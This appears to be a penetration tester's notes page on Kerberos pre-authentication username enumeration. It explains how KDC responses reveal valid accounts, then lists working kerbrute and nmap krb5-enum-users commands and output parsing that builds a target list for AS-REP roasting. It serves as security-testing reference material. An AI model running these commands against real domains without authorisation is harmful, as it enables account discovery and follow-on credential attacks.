Kerberos Pre-Auth Username Enumeration
How it Works
We can send a request for a TGT --- without a pre-authentication hash --- to the Kerberos Key Distribution Center (KDC) with specific usernames in the request. If the username is valid, the KDC will prompt us for pre-authentication if required, or return a TGT if pre-authentication is not required. If the username is invalid, the KDC will respond with PRINCIPAL UNKNOWN
.
Enumeration
Kerbrute
https://github.com/ropnop/kerbrute
Deduplicate and Save a List of Usernames to Spray at the KDC
cat /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt | tr '[:upper:]' '[:lower:]' | sort -u > kerberos_users.txt
Use Kerbrute to Enumerate Valid Usernames
kerbrute userenum -d domain.tld --dc dc-ip-here -t 100 -o kerbrute.log ./kerberos_users.txt
Attempting to find AS-REP hashes
cat kerbrute.log
grep '@' kerbrute.log | awk -v FS=' ' '{print $7}' | cut -d '@' -f 1 > as_rep_test.txt
cat as_rep_test.txt
Generate a list of users in as_rep_test.txt
for use with Impacket's GetNPUsers script
https://notes.benheater.com/books/active-directory/page/as-rep-roasting-internalexternal
Nmap
nmap
is not multi-threaded and does not have good memory management when using large word lists
domain_controller=dc1.domain.tld
domain='domain.tld'
username_list='/usr/share/seclists/Usernames/top-usernames-shortlist.txt'
nmap -Pn -p88 --script krb5-enum-users --script-args krb5-enum-users.realm=$domain,userdb=$username_list $domain_controller